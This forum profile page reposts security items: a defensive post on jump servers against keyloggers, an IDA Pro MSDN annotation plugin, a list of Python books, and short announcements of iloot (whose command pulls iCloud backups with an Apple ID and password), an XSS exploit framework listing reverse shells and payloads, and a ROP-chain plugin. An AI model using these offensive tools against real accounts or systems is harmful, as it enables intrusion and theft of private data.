Everything posted by Nytro
-
[h=3]Defence - Beating Keyloggers to protect Domain Admin Creds - Windows[/h]

Hi All,

This post is a little different to what I normally do and I think it is a long time coming in general. Nowadays the bloggers in the IT Security community are all focusing on the hacks, exploits and ways to break in. I thought I would show you a way to improve the overall security of your network. This can be implemented quite easily and is a control mandated in the Internet Security Manual.

For anyone not in Australia or not aware of the ISM, here is the blurb from ASD: “The Australian Signals Directorate (ASD) produces the Australian Government Information Security Manual (ISM). The manual is the standard which governs the security of government ICT systems.” Link: http://www.asd.gov.au/publications/Information_Security_Manual_2014_Controls.pdf

I want to state that this is not the only way to design your network, and this example is specifically for handling keylogging to protect your domain admin accounts. From what I am seeing there are two types of networks around these days.

[*] Flat networks: hosts, admin hosts and servers in the same subnet.
[*] Layered networks: hosts in one subnet, admin hosts in another subnet and servers in another subnet.

In a flat network any normal host / admin host can RDP into any server. In a layered network normal hosts cannot RDP into the server subnet, but admin hosts can. What does this mean for keyloggers?

Flat Network

In a flat network your domain admins / server admins are able to log on to any server they want with their admin credentials. If this is the same as their workstation credentials, email associated, this is a bad thing in general. For this example we will assume the following: the workstation credentials are different to the admin credentials. The workstation credential will be named BobSmith. The admin credential will be named BobAdmin.

Layered Network

Now expand on this: Bob is in a separate subnet to the rest of the environment and he can RDP to any server he chooses to. Bob has a keylogger that he doesn’t know about. When Bob decides to log on to Server A he uses his BobAdmin account. Here is what it looks like.

Attack #1

Bob logs in to the RDP server. Meterpreter dumps out the password that is typed and the admin credentials are presented. Dammit! Isn’t defense in layers supposed to be better? Well, yes. So you are now asking: how do you protect the domain admin credentials? Easy… Set up a management server. Here is a picture of how it works. I dummied up some IP ranges to give you an example.

Management Server: You can handle this one of two ways.

[*] Bob Smith needs a separate account that is allowed to RDP onto the management server but has no admin privileges on the management server. For example an account named bobRDP. bobRDP can only RDP to the management server and nowhere else.
[*] Bob Smith uses ‘BobSmith’ to RDP to the server and again has no admin privileges on the management server.

Option 1 allows a little more separation of accounts and adds an administrative burden. Option 2 is a quick fix. It is important that BobSmith is only allowed to log on to the management server and nowhere else. Essentially the admin subnet is only allowed TCP 3389 / RDP to the management server, NOWHERE ELSE! No other ports. For this example I am using option 2 because I’m lazy and it allows me to bang out this post quickly.

Attack #2

[*] Permissions on the jump server for bobsmith.
[*] Pre-meterpreter dump on Bob’s workstation. Nothing showed.
[*] Bob RDPs to the management server.
[*] Runs mstsc and RDPs to the domain controller server.
[*] Open Command Prompt on the jump server.
[*] Open Command Prompt on the nested RDP - domain controller.
[*] Dump of the meterpreter keylogger after.

As you can see there are no remnants of BobAdmin’s password or him typing it in on the management server. Keylogging problem solved!

Now people may look at this post and find so many ways around this design with other attack vectors. But this post was specifically for one issue, and that is to beat keyloggers, nothing else. Hopefully this post has been helpful to you.

Posted by Mickey Perre at 20:07

Sursa: Mickeys Security Blogspot: Defence - Beating Keyloggers to protect Domain Admin Creds - Windows
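The post's one firewall requirement (the admin subnet may reach the management server on TCP 3389 and nothing else) is easy to state and easy to get subtly wrong in a rule set. The following is an added example, not code from Mickey Perre's post: a small first-match ACL evaluator plus an audit function that probes a rule set and lists every server/port an admin host could still reach directly. The subnets, host addresses and the "flat" versus "jump server" rule sets are constructed placeholders, not the ranges from the post's diagram.

```python
"""Added example (not from the original post): audit a subnet ACL for the
jump-server property "admin subnet -> management server:3389 only"."""
import ipaddress
from dataclasses import dataclass
from typing import Optional

# Constructed placeholder addressing; assumption, not the post's dummied-up ranges.
WORKSTATION_NET = ipaddress.ip_network("10.10.0.0/24")
ADMIN_NET = ipaddress.ip_network("10.20.0.0/24")
SERVER_NET = ipaddress.ip_network("10.30.0.0/24")
MGMT_SERVER = ipaddress.ip_address("10.30.0.10")      # the jump / management server
DOMAIN_CONTROLLER = ipaddress.ip_address("10.30.0.5")  # a server that must NOT be reachable directly
RDP = 3389


@dataclass(frozen=True)
class Rule:
    src: ipaddress.IPv4Network
    dst: ipaddress.IPv4Network      # use a /32 for a single host
    port: Optional[int]             # None means any TCP port
    action: str                     # "allow" or "deny"


def evaluate(rules, src, dst, port):
    """First matching rule wins; anything unmatched is denied (default deny)."""
    src, dst = ipaddress.ip_address(src), ipaddress.ip_address(dst)
    for r in rules:
        if src in r.src and dst in r.dst and (r.port is None or r.port == port):
            return r.action
    return "deny"


# Layered network without a jump server: the admin subnet may RDP to every server.
FLAT_RULES = [Rule(ADMIN_NET, SERVER_NET, RDP, "allow")]

# The post's design: only the management server, only 3389, everything else denied.
JUMP_RULES = [
    Rule(ADMIN_NET, ipaddress.ip_network(f"{MGMT_SERVER}/32"), RDP, "allow"),
    Rule(ADMIN_NET, SERVER_NET, None, "deny"),
]

# Representative ports to probe with; constructed list, extend as needed.
PROBE_PORTS = (RDP, 445, 135)


def audit_jump_policy(rules, admin_net=ADMIN_NET, mgmt_server=MGMT_SERVER, servers_net=SERVER_NET):
    """Return every (destination, port) an admin host can reach directly other than
    the management server on RDP. An empty list means the rule set honours the post's
    requirement; a non-empty list shows where the keylogger defence is bypassed."""
    src = next(admin_net.hosts())  # any admin host; the rules are subnet-wide
    leaks = []
    for dst in servers_net.hosts():
        for port in PROBE_PORTS:
            if evaluate(rules, src, dst, port) == "allow" and not (dst == mgmt_server and port == RDP):
                leaks.append((str(dst), port))
    return leaks


if __name__ == "__main__":
    print("flat policy leaks:", len(audit_jump_policy(FLAT_RULES)))   # 253 reachable server/port pairs
    print("jump policy leaks:", audit_jump_policy(JUMP_RULES))         # []
```

The deny rule in `JUMP_RULES` is what makes the audit pass; without it the default-deny at the end of `evaluate` still holds, but on a real firewall an earlier broad allow (as in `FLAT_RULES`) would silently win, which is exactly what the audit is meant to surface.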
-
[h=3]FLARE IDA Pro Script Series: MSDN Annotations IDA Pro for Malware Analysis[/h]

September 11, 2014 | By Moritz Raabe

The FireEye Labs Advanced Reverse Engineering (FLARE) Team continues to share knowledge and tools with the community. We started this blog series with a script for Automatic Recovery of Constructed Strings in Malware. As always, you can download these scripts at the following location: https://github.com/fireeye/flare-ida. We hope you find all these scripts as useful as we do.

Motivation

During my summer internship with the FLARE team, my goal was to develop IDAPython plug-ins that speed up the reverse engineering workflow in IDA Pro. While analyzing malware samples with the team, I realized that a lot of time is spent looking up information about functions, arguments, and constants at the Microsoft Developer Network (MSDN) website. Frequently switching to the developer documentation can interrupt the reverse engineering process, so we thought about ways to integrate MSDN information into IDA Pro automatically. In this blog post we will release a script that does just that, and we will show you how to use it.

Introduction

The MSDN Annotations plug-in integrates information about functions, arguments and return values into IDA Pro’s disassembly listing in the form of IDA comments. This allows the information to be integrated as seamlessly as possible. Additionally, the plug-in is able to automatically rename constants, which further speeds up the analyst workflow. The plug-in relies on an offline XML database file, which is generated from Microsoft’s documentation and IDA type library files.

Features

Table 1 shows what benefit the plug-in provides to an analyst. On the left you can see IDA Pro’s standard disassembly: seven arguments get pushed onto the stack and then the CreateFileA function is called. Normally an analyst would have to look up function, argument and possibly constant descriptions in the documentation to understand what this code snippet is trying to accomplish. To obtain readable constant values, an analyst would be required to research the respective argument, import the corresponding standard enumeration into IDA and then manually rename each value.

The right side of Table 1 shows the result of executing our plug-in, showing the support it offers to an analyst. The most obvious change is that constants are renamed automatically. In this example, 40000000h was automatically converted to GENERIC_WRITE. Additionally, each function argument is renamed to a unique name, so the corresponding description can be added to the disassembly.

Table 1: Automatic labelling of standard symbolic constants

In Figure 1 you can see how the plug-in enables you to display function, argument, and constant information right within the disassembly. The top image shows how hovering over the CreateFileA function displays a short description and the return value. In the middle image, hovering over the hTemplateFile argument displays the corresponding description. And in the bottom image, you can see how hovering over dwShareMode, the automatically renamed constant, displays descriptive information.

Figure 1: Hovering function names, arguments and constants displays the respective descriptions

How it works

Before the plug-in makes any changes to the disassembly, it creates a backup of the current IDA database file (IDB). This file gets stored in the same directory as the current database and can be used to revert to the previous markup in case you do not like the changes or something goes wrong. The plug-in is designed to run once on a sample before you start your analysis. It relies on an offline database generated from the MSDN documentation and IDA Pro type library (TIL) files.

For every function reference in the import table, the plug-in annotates the function’s description and return value, adds argument descriptions, and renames constants. An example of an annotated import table is depicted in Figure 2. It shows how a descriptive comment is added to each API function call. In order to identify addresses of instructions that position arguments prior to a function call, the plug-in relies on IDA Pro’s markup.

Figure 2: Annotated import table

Figure 3 shows the additional .msdn segment the plug-in creates in order to store argument descriptions. This only impacts the IDA database file and does not modify the original binary.

Figure 3: The additional segment added to the IDA database

The .msdn segment stores the argument descriptions as shown in Figure 4. The unique argument names and their descriptive comments are sequentially added to the segment.

Figure 4: Names and comments inserted for argument descriptions

To allow the user to see constant descriptions by hovering over constants in the disassembly, the plug-in imports IDA Pro’s relevant standard enumeration and adds descriptive comments to the enumeration members. Figure 5 shows this for the MACRO_CREATE enumeration, which stores constants passed as dwCreationDisposition to CreateFileA.

Figure 5: Descriptions added to the constant enumeration members

Preparing the MSDN database file

The plug-in’s graphical interface requires you to have the QT framework and Python scripting installed. This is included with the IDA Pro 6.6 release. You can also set it up for IDA 6.5 as described here (Precompiled PySide binaries for IDA Pro | Hex Blog).

As mentioned earlier, the plug-in requires an XML database file storing the MSDN documentation. We cannot distribute the database file with the plug-in because Microsoft holds the copyright for it. However, we provide a script to generate the database file. It can be cloned from the git repository at https://github.com/fireeye/flare-ida together with the annotation plug-in. You can take the following steps to set up the database file. You only have to do this once.

[*] Download and install an offline version of the MSDN documentation. You can download the Microsoft Windows SDK MSDN documentation. The standalone installer can be downloaded from Download Microsoft Windows SDK for Windows 7 and .NET Framework 3.5 SP1 (ISO) from Official Microsoft Download Center. Although it is not the newest SDK version, it includes all the needed information and data extraction is straight-forward. As shown in Figure 6, you can select to only install the help files. By default they are located in C:\Program Files\Microsoft SDKs\Windows\v7.0\Help\1033.

Figure 6: Installing a local copy of the MSDN documentation

[*] Extract the files with an archive manager like 7-zip to a directory of your choice.
[*] Download and extract tilib.exe from Hex-Rays’ download page at https://www.hex-rays.com/products/ida/support/download.shtml. To allow the plug-in to rename constants, it needs to know which enumerations to import. IDA Pro stores this information in TIL files located in %IDADIR%/til/. Hex-Rays provides a tool (tilib) to show TIL file contents via their download page for registered users. Download the tilib archive and extract the binary into %IDADIR%. If you run tilib without any arguments and it displays its help message, the program is running correctly.
[*] Run MSDN_crawler/msdn_crawler.py <path to extracted MSDN documentation> <path to tilib.exe> <path to til files>. With these prerequisites fulfilled, you can run the MSDN_crawler.py script, located in the MSDN_crawler directory. It expects the path to the TIL files you want to extract (normally %IDADIR%/til/pc/) and the path to the extracted MSDN documentation. After the script finishes execution the final XML database file should be located in the MSDN_data directory.

You can now run our plug-in to annotate your disassembly in IDA.

Running the MSDN annotations plug-in

In IDA, use File – Script file… (ALT + F7) to open the script named annotate_IDB_MSDN.py. This will display the dialog box shown in Figure 7 that allows you to configure the modifications the plug-in performs. By default, the plug-in annotates functions and arguments and renames constants. If you change the settings and execute the plug-in by clicking OK, your settings get stored in a configuration file in the plug-in’s directory. This allows you to quickly run the plug-in on other samples using your preferred settings. If you do not choose to annotate functions and/or arguments, you will not be able to see the respective descriptions by hovering over the element.

Figure 7: The plug-in’s configuration window showing the default settings

When you choose to use repeatable comments for function name annotations, the description is visible in the disassembly listing, as shown in Figure 8.

Figure 8: The plug-in’s preview of function annotations with repeatable comments

Similar Tools and Known Limitations

Parts of our solution were inspired by existing IDA Pro plug-ins, such as IDAScope and IDAAPIHelp. A special thank you goes out to Zynamics for their MSDN crawler and the IDA importer, which greatly supported our development. Our plug-in has mainly been tested on IDA Pro for Windows, though it should work on all platforms.

Due to the structure of the MSDN documentation and limitations of the MSDN crawler, not all constants can be parsed automatically. When you encounter missing information you can extend the annotation database by placing files with supplemental information into the MSDN_data directory. In order to be processed correctly, they have to be valid XML following the schema given in the main database file (msdn_data.xml). However, if you want to extend partly existing function information, you only have to add the additional fields. Name tags are mandatory for this, as they get used to identify the respective element. For example, if the parser did not recognize a commonly used constant, we could add the information manually. For the CreateFileA function’s dwDesiredAccess argument the additional information could look similar to Listing 1.

[TABLE=width: 100%] [TR] [TD]
<?xml version="1.0" encoding="ISO-8859-1"?>
<msdn>
  <functions>
    <function>
      <name>CreateFileA</name>
      <arguments>
        <argument>
          <name>dwDesiredAccess</name>
          <constants enums="MACRO_GENERIC">
            <constant>
              <name>GENERIC_ALL</name>
              <value>0x10000000</value>
              <description>All possible access rights</description>
            </constant>
            <constant>
              <name>GENERIC_EXECUTE</name>
              <value>0x20000000</value>
              <description>Execute access</description>
            </constant>
            <constant>
              <name>GENERIC_WRITE</name>
              <value>0x40000000</value>
              <description>Write access</description>
            </constant>
            <constant>
              <name>GENERIC_READ</name>
              <value>0x80000000</value>
              <description>Read access</description>
            </constant>
          </constants>
        </argument>
      </arguments>
    </function>
  </functions>
</msdn>
[/TD] [/TR] [/TABLE]

Listing 1: Additional information enhancing the dwDesiredAccess argument for the CreateFileA function

Conclusion

In this post, we showed how you can generate an MSDN database file used by our plug-in to automatically annotate information about functions, arguments and constants into IDA Pro’s disassembly. Furthermore, we talked about how the plug-in works, and how you can configure and customize it. We hope this speeds up your analysis process! Stay tuned for the FLARE Team’s next post where we will release solutions for the FLARE On Challenge (www.flare-on.com).

Sursa: FLARE IDA Pro Script Series: MSDN Annotations IDA Pro for Malware Analysis | FireEye Blog
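To show what a consumer of a Listing 1 style supplement has to do (enforce the mandatory <name> tags, parse the hex values, and map a raw argument value back to its symbolic name as in Table 1), here is an added example. It is not the flare-ida plug-in's code and makes no claim about how annotate_IDB_MSDN.py or msdn_crawler.py are implemented; it only assumes the element layout shown in Listing 1. It goes one step beyond the single-constant rename in Table 1 by decomposing an OR'ed flag word into its members, which is how a dwDesiredAccess value such as 0xC0000000 would normally be read.

```python
"""Added example (not flare-ida code): parse a Listing-1 style MSDN supplement and
resolve raw argument values to symbolic constant names."""
import xml.etree.ElementTree as ET

# Constructed copy of the Listing 1 supplement for CreateFileA / dwDesiredAccess.
SAMPLE_XML = """<?xml version="1.0" encoding="ISO-8859-1"?>
<msdn><functions><function><name>CreateFileA</name><arguments><argument>
<name>dwDesiredAccess</name><constants enums="MACRO_GENERIC">
<constant><name>GENERIC_ALL</name><value>0x10000000</value><description>All possible access rights</description></constant>
<constant><name>GENERIC_EXECUTE</name><value>0x20000000</value><description>Execute access</description></constant>
<constant><name>GENERIC_WRITE</name><value>0x40000000</value><description>Write access</description></constant>
<constant><name>GENERIC_READ</name><value>0x80000000</value><description>Read access</description></constant>
</constants></argument></arguments></function></functions></msdn>"""


def _required_name(elem, kind):
    """The post says <name> tags are mandatory because they identify the element; enforce that."""
    name = elem.findtext("name")
    if not name or not name.strip():
        raise ValueError(f"<{kind}> element without mandatory <name> tag")
    return name.strip()


def load_constant_table(xml_text):
    """Return {(function, argument): {int value: (constant name, description)}}."""
    # Feed bytes so the declared ISO-8859-1 encoding is honoured by the parser.
    root = ET.fromstring(xml_text.encode("iso-8859-1"))
    table = {}
    for func in root.iter("function"):
        fname = _required_name(func, "function")
        for arg in func.iter("argument"):
            aname = _required_name(arg, "argument")
            consts = {}
            for const in arg.iter("constant"):
                cname = _required_name(const, "constant")
                value = int(const.findtext("value", "0"), 0)  # base 0 accepts "0x..." and decimal
                consts[value] = (cname, (const.findtext("description") or "").strip())
            table[(fname, aname)] = consts
    return table


def is_valid_supplement(xml_text):
    """True when the supplement parses and every element carries its <name>."""
    try:
        load_constant_table(xml_text)
        return True
    except (ValueError, ET.ParseError):
        return False


def symbolic_name(table, function, argument, value):
    """Resolve a raw argument value. Exact matches come back as-is (0x40000000 ->
    GENERIC_WRITE); otherwise the value is split into known flag members, widest
    first, and any unknown leftover bits are kept as hex so nothing is hidden."""
    consts = table.get((function, argument), {})
    if value in consts:
        return consts[value][0]
    names, remaining = [], value
    for bit_value, (name, _) in sorted(consts.items(), reverse=True):
        if bit_value and remaining & bit_value == bit_value:
            names.append(name)
            remaining &= ~bit_value
    if remaining:
        names.append(f"0x{remaining:X}")
    return " | ".join(names) if names else f"0x{value:X}"


if __name__ == "__main__":
    t = load_constant_table(SAMPLE_XML)
    for raw in (0x40000000, 0xC0000000, 0x40000001):
        print(f"{raw:#010x} -> {symbolic_name(t, 'CreateFileA', 'dwDesiredAccess', raw)}")
```

Keeping unknown bits visible as hex, rather than silently dropping them, is the behaviour you want from any automatic renaming: an annotation that looks complete but hides a bit is worse for the analyst than a raw number.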
-
Using this CLI tool you can download backups of devices assigned to your AppleID. Based on iphone-dataprotection script, so copyrights belong to respective owners. Offset operations added and other minor bugs fixed. This tool is for educational purposes only. Before you start, make sure it's not illegal in your country. Follow us on twitter @hackappcom and facebook Hackapp blog Mobile Applications Scanner hackapp.com [h=1]Example[/h] python iloot.py <appleID> <password> Sursa: https://github.com/hackappcom/iloot
-
Xenotix provides Zero False Positive XSS Detection by performing the scan within the browser engines where, in the real world, payloads get reflected. The Xenotix Scanner Module is incorporated with 3 intelligent fuzzers to reduce the scan time and produce better results. If you really don't like the tool logic, then leverage the power of the Xenotix API to make the tool work like you wanted it to.

See What's new! Feature Additions:

[*] Intelli Fuzzer
[*] Context Based Fuzzer
[*] Blind Fuzzer
[*] HTA Network Configuration
[*] HTA Drive-By
[*] HTA Drive-By Reverse Shell
[*] JSFuck 6 Char Encoder
[*] jjencode Encoder
[*] aaencode Encoder
[*] IP to Location
[*] IP to GeoLocation
[*] IP Hinting
[*] Download Spoofer
[*] HTML5 Geolocation API
[*] Reverse TCP Shell Addon (Linux)
[*] OAuth 1.0a Request Scanner
[*] 4800+ Payloads
[*] SSL Error Fixed

Download OWASP Xenotix XSS Exploit Framework or https://www.owasp.org/index.php/OWASP_Xenotix_XSS_Exploit_Framework

Regards, Ajin | @ajinabraham

Sursa: WebApp Sec: OWASP Xenotix XSS Exploit Framework v6 Released
-
[h=1]IDA Sploiter[/h]

[TABLE]
[TR] [TH]Download[/TH] [TD]idasploiter-1.0.zip[/TD] [/TR]
[TR] [TH]Size[/TH] [TD]25.4 KB[/TD] [/TR]
[TR] [TH]Date[/TH] [TD]September 14th, 2014[/TD] [/TR]
[TR] [TH]Version[/TH] [TD]1.0[/TD] [/TR]
[/TABLE]

IDA Sploiter is a plugin for Hex-Rays' IDA Pro disassembler designed to enhance IDA's capabilities as an exploit development and vulnerability research tool. Some of the plugin's features include a powerful ROP gadgets search engine, semantic gadget analysis and filtering, interactive ROP chain builder, stack pivot analysis, writable function pointer search, cyclic memory pattern generation and offset analysis, detection of bad characters and memory holes, and many others.

The motivation for the development of IDA Sploiter was to make IDA Pro a comfortable, powerful and integrated environment for vulnerability research and exploit development. The plugin is designed to make many repetitive and time consuming tasks as effortless and natural as possible, so you can concentrate on other more challenging aspects of exploit development.

To make the work with the plugin convenient, IDA Sploiter closely integrates with the IDA UI and exposes its functionality and various configurations through various views and forms. The plugin's logic uses IDA's powerful disassembly engine and various debugger plugins. As a result, IDA Sploiter can take advantage of many of IDA's unique features (e.g. building ROP chains remotely on a lab machine while effortlessly switching between debugger plugins).

In the user guide below, you will find a comprehensive discussion of various plugin features and their sample use. Most of the sections are independent of each other, so you are welcome to jump ahead or read through the entire guide. Feel free to contact me if you have any questions, feature requests, bugs or just to say hello.

Table of Contents

[*] Installation
[*] Compatibility
[*] User guide
[*] Modules: Filtering Modules; Searching module selection
[*] ROP gadgets: Searching ROP gadgets; Viewing ROP gadgets; Syntactic and semantic gadget filters; ROP chain builder; Stack Pivoting; Exporting
[*] Writable function pointers: Searching writable function pointers; Viewing writable function pointers; Pointer offsets; Setting breakpoints; Exporting
[*] Memory patterns: Creating a pattern; Detecting a pattern
[*] Comparing file to memory
[*] Special Note
[*] References

Sursa: ida sploiter | projects | sprawl
-
[h=2]Text Processing in Python[/h] [h=3]David Mertz[/h]
Intermediate. This is an example-driven, hands-on tutorial that carefully teaches programmers how to accomplish numerous text processing tasks using Python.

[h=2]Probabilistic Programming and Bayesian Methods for Hackers: Using Python and PyMC[/h] [h=3]Cam Davidson-Pilon and community[/h]
Intermediate. Aka 'Bayesian Methods for Hackers': an introduction to Bayesian methods and probabilistic programming in data analysis with a computation/understanding-first, mathematics-second point of view. All in pure Python.

[h=2]Explore Flask[/h] [h=3]Robert Picard[/h]
Intermediate. This book is a collection of the best practices for using Flask. There are a lot of pieces to the average Flask application.

[h=2]Building skills in Python[/h] [h=3]Steven F. Lot[/h]
Beginner. This 450+ page book has 42 chapters that will help you build Python programming skills through a series of exercises. This book includes six projects from straightforward to sophisticated that will help solidify your Python skills.

[h=2]web2py Complete Manual[/h] [h=3]Massimo Di Pierro[/h]
Intermediate. As you will learn in the following pages, web2py tries to lower the barrier of entry to web development by focusing on three main goals: ease of use, rapid development and security.

[h=2]Learning Python, 4th Edition[/h] [h=3]Mark Lutz[/h]
Beginner. It's an easy-to-follow self-paced tutorial, based on author and Python expert Mark Lutz's popular training course.

[h=2]The Hitchhiker’s Guide to Python![/h] [h=3]Kenneth Reitz[/h]
Beginner. This opinionated guide exists to provide both novice and expert Python developers a best-practice handbook to the installation, configuration, and usage of Python on a daily basis.

[h=2]Biopython[/h] [h=3]Various authors[/h]
Intermediate. This is a tutorial and cookbook for Biopython (Biopython is a set of freely available tools for biological computations).

[h=2]Invent Your Own Computer Games with Python[/h] [h=3]Al Sweigart[/h]
Intermediate. Small and nice Python game examples.

[h=2]Python Practice Book[/h] [h=3]Anand Chitipothu[/h]
Beginner. This book is prepared from the training notes of Anand Chitipothu. Anand conducts Python training classes on a semi-regular basis in Bangalore, India.

[h=2]Building skills in OOP[/h] [h=3]Steven F. Lot[/h]
Intermediate. How do you move from OO programming to OO design? This 301-page book has 49 chapters that will help you build OO design skills through the creation of a moderately complex family of application programs.

[h=2]Python Cookbook, Third Edition[/h] [h=3]Various authors[/h]
Intermediate. This book is aimed at more experienced Python programmers who are looking to deepen their understanding of the language and modern programming idioms.

[h=2]How to Tango with Django[/h] [h=3]Leif Azzopardi[/h]
Beginner. A beginner's guide to web development with Django 1.5.4. This book has been designed to get you going fast and to learn by example. You'll learn the key aspects of the Python Django Framework by developing an application called Rango.

[h=2]Think Python[/h] [h=3]Allen B. Downey[/h]
Beginner. A very exhaustive book covering most of the language features, from datatypes to OOP and debugging.

[h=2]Kivy programming Guide[/h] [h=3]Kivy[/h]
Intermediate. Discover Kivy, the multitouch Python framework for desktop and mobile, and learn how to create a simple game.

[h=2]Python para Desenvolvedores (2nd Edition)[/h] [h=3]Luiz Eduardo Borges[/h]
Intermediate. [PORTUGUESE] This book covers topics including: creating user interfaces, computer graphics, internet applications, distributed systems, among others.

[h=2]Django Tutorial[/h] [h=3]Community[/h]
Intermediate. With this hands-on tutorial, discover Django, the popular high-level Python Web framework that encourages rapid development and clean, pragmatic design.

[h=2]Python Scientific lecture notes[/h] [h=3]by the community[/h]
Intermediate. Teaching material on the scientific Python ecosystem, a quick introduction to central tools and techniques. The different chapters each correspond to a 1 to 2 hour course with increasing level of expertise, from beginner to expert.

[h=2]Programmez avec Python 2[/h] [h=3]Gérard Swinnen[/h]
Beginner. [FRENCH] Learn to program with Python 2. Discover programming and the Python language through this reference work.

[h=2]Making games with Python and Pygame[/h] [h=3]Al Sweigart[/h]
Intermediate. "Making Games with Python & Pygame" covers the Pygame library with the source code for 11 games.

[h=2]Pyramid for Humans[/h] [h=3]Community[/h]
Intermediate. With this tutorial, discover Pyramid, a Python web application development framework. Its primary goal is to make it easier for a Python developer to create web applications.

[h=2]Problem Solving with Algorithms and Data Structures Using Python[/h] [h=3]B. Miller & D. Ranum[/h]
Intermediate. This book is a CS2 data structures textbook, with a review of Python concepts in chapter 1.

[h=2]Flask microframework[/h] [h=3]Armin Ronacher[/h]
Intermediate. Learn the Flask web microframework by example. Flask aims to keep the core simple but extensible and gives you freedom to choose the libraries of your choice.

[h=2]Learn Python The Hard Way[/h] [h=3]Zed A. Shaw[/h]
Beginner. Have you always wanted to learn how to code but never thought you could? Do you want to challenge your brain in a new way?

[h=2]Python for you and me[/h] [h=3]Kushal Das[/h]
Beginner. A book for total newcomers to the Python world. It was started as a book for students before they read the Python tutorial.

[h=2]Programmez avec Python 3[/h] [h=3]Gérard Swinnen[/h]
Beginner. [FRENCH] Learn to program with Python 3. An update of the previous work covering the specifics of Python 3.

[h=2]How to Think Like a Computer Scientist: Second Interactive Edition[/h] [h=3]B. Miller & D. Ranum[/h]
Beginner. This interactive book teaches you Python the interactive way, right in the browser.

[h=2]Dive into Python (2004)[/h] [h=3]Mark Pilgrim[/h]
Intermediate. Dive Into Python is a free Python book (from 2004) for experienced programmers. It covers many basics of the language.

[h=2]Hacking Secret Ciphers with Python[/h] [h=3]Al Sweigart[/h]
Beginner. The book teaches complete beginners how to program in the Python programming language. The reader not only learns about several classical ciphers, but also how to write programs that encrypt and hack these ciphers.

[h=2]Test-Driven Development with Python[/h] [h=3]Harry Percival[/h]
Intermediate. This book uses a concrete example (the development of a website, from scratch) to teach the TDD methodology, and how it applies to web programming, from the basics of database integration and JavaScript, going via browser-automation tools like Selenium, to advanced (and trendy) topics like NoSQL, websockets and async programming.

[h=2]Dive into Python 3[/h] [h=3]Mark Pilgrim[/h]
Intermediate. Dive Into Python 3 covers what's new in Python 3 and how it differs from Python 2.

[h=2]High Performance Python tutorial[/h] [h=3]Ian Ozsvald[/h]
Advanced. In this 55-page tutorial, Ian Ozsvald shows you a number of techniques to get a 10-500 performance increase in your Python apps, from profiling, to PyPy, numPy, multiprocessing...

[h=2]Python course[/h] [h=3]Patrick Fuchs / Pierre Poulain[/h]
Beginner. [FRENCH] Beginner and progressive course about Python theory and concepts.

[h=2]Modeling Creativity[/h] [h=3]Tom De Smedt[/h]
Intermediate. Case studies in Python: using the libraries nodebox and pattern, the author creates wonderful fractals and infographics; Python code snippets included.

[h=2]A byte of Python[/h] [h=3]Swaroop C H[/h]
Beginner. This book aims to help you learn the wonderful Python language and show how to get things done quickly and painlessly, in effect 'The Perfect Anti-venom to your programming problems'.

[h=2]Python 101 - Introduction to Python[/h] [h=3]Dave Kuhlman[/h]
Beginner. This document is a syllabus for a first course in Python programming. This course contains an introduction to the Python language, instruction in the important and commonly used features of the language, and practical exercises in the use of those features.

[h=2]A bit of Python & other things.[/h] [h=3]Jesse Noller[/h]
Beginner. A useful page with good links to read about Python.

[h=2]Snake Wrangling for Kids[/h] [h=3]Jason R. Briggs[/h]
Beginner. [DOWNLOAD REQUIRED] For children 8 years and older who would like to learn computer programming. It covers the very basics of programming, and uses the Python programming language to teach the concepts.

[h=2]Data Structures and Algorithms with Object-Oriented Design Patterns in Python[/h] [h=3]Bruno R. Preiss[/h]
Intermediate. This book is about the fundamentals of data structures and algorithms. It uses object oriented design patterns and teaches topics like stacks, queues, lists, hashing and graphs. There are also versions for other programming languages.

[h=2]The Standard Python Library[/h] [h=3]Fredrik Lundh[/h]
Intermediate. This book provides a brief description of each of the 200+ modules of the Python standard library, with usage examples.

[h=2]Python 3x Programming (sample)[/h] [h=3]Jody S. Ginther[/h]
Beginner. (4 free chapters) Python 3x Programming, Made Fun and Easier by Jody S. Ginther is for the beginning programmer who wants to learn visually and have some fun while learning programming. The full course will take the beginner from ground zero to making their own arcade style game complete with music, sound, graphics, and how to make a distribution package to share it with your friends, in 21 lessons.

[h=2]Porting to Python 3: An in-depth guide[/h] [h=3]Lennart Regebro[/h]
Intermediate. This book guides you through the process of porting your Python 2 code to Python 3, from choosing a porting strategy to solving your distribution issues. Using plenty of code examples, it takes you across the hurdles and shows you the new Python features.

[h=2]Programming Computer Vision with Python[/h] [h=3]Jan Erik Solem[/h]
Advanced. [PDF DRAFT] This book gives an entry point to hands-on computer vision (images, videos...) with enough understanding of the underlying theory and algorithms.

[h=2]Think Complexity[/h] [h=3]Allen B. Downey[/h]
Advanced. This book is about complexity science, data structures and algorithms, intermediate programming in Python, and the philosophy of science.

[h=2]Natural Language Processing with Python[/h] [h=3]S. Bird, E. Klein & E. Loper[/h]
Advanced. Practical introduction to programming for language processing, written by the creators of NLTK.

[h=2]Think Stats[/h] [h=3]Allen B. Downey[/h]
Advanced. Think Stats is an introduction to Probability and Statistics for Python programmers.

[h=2]Getting Started with Django[/h] [h=3]Kenneth Love[/h]
Beginner. Getting Started with Django (or GSWD) is a series of video-based lessons meant to take you from novice to competent [1], or maybe even beyond.

[h=2]Building skills in Programming[/h] [h=3]Steven F. Lot[/h]
Beginner. How do you learn to program? Through a series of simple exercises that teach programming fundamentals with an easy-to-use, easy-to-learn programming language.

[h=2]An introduction to Python[/h] [h=3]John C. Lusth[/h]
Beginner. A complete scholarly overview of all Python 3 functionalities from Alabama University.

[h=2]Python Module of the week[/h] [h=3]Doug Hellman[/h]
Intermediate. The Python Module of the Week series, or PyMOTW, is a tour of the Python standard library through short and concrete examples. It covers more than 50 modules.

[h=2]Djen of Django[/h] [h=3]Agiliq[/h]
Intermediate. Djen of Django is a book consisting of a series of small Django projects based on small real-world examples. For instance, building a Pastebin, a Blog or a Project Management Application. Djen of Django focuses on teaching the reader Django best practices through the use of real-world examples.

[h=2]Python Course[/h] [h=3]Google[/h]
Beginner. This is a free class for people with a little bit of programming experience who want to learn Python.

[h=2]A Programmer's Guide to Data Mining[/h] [h=3]Ron Zacharski[/h]
Intermediate. A guide to practical data mining, collective intelligence, and building recommendation systems.

[h=2]Python in Hydrology[/h] [h=3]Sat Kumar Tomer[/h]
Beginner. Python in Hydrology is written for learning Python using its applications in hydrology. The book covers the basic applications of hydrology, and also advanced topics like the use of copulas.

[h=2]Non-Programmer's Tutorial for Python 3[/h] [h=3]Josh Cogliati/Wikibooks/Others[/h]
Beginner. The Non-Programmers' Tutorial For Python 3 is a tutorial designed to be an introduction to the Python programming language. This guide is for someone with no programming experience.

[h=2]Python para todos[/h] [h=3]Raúl González Duque[/h]
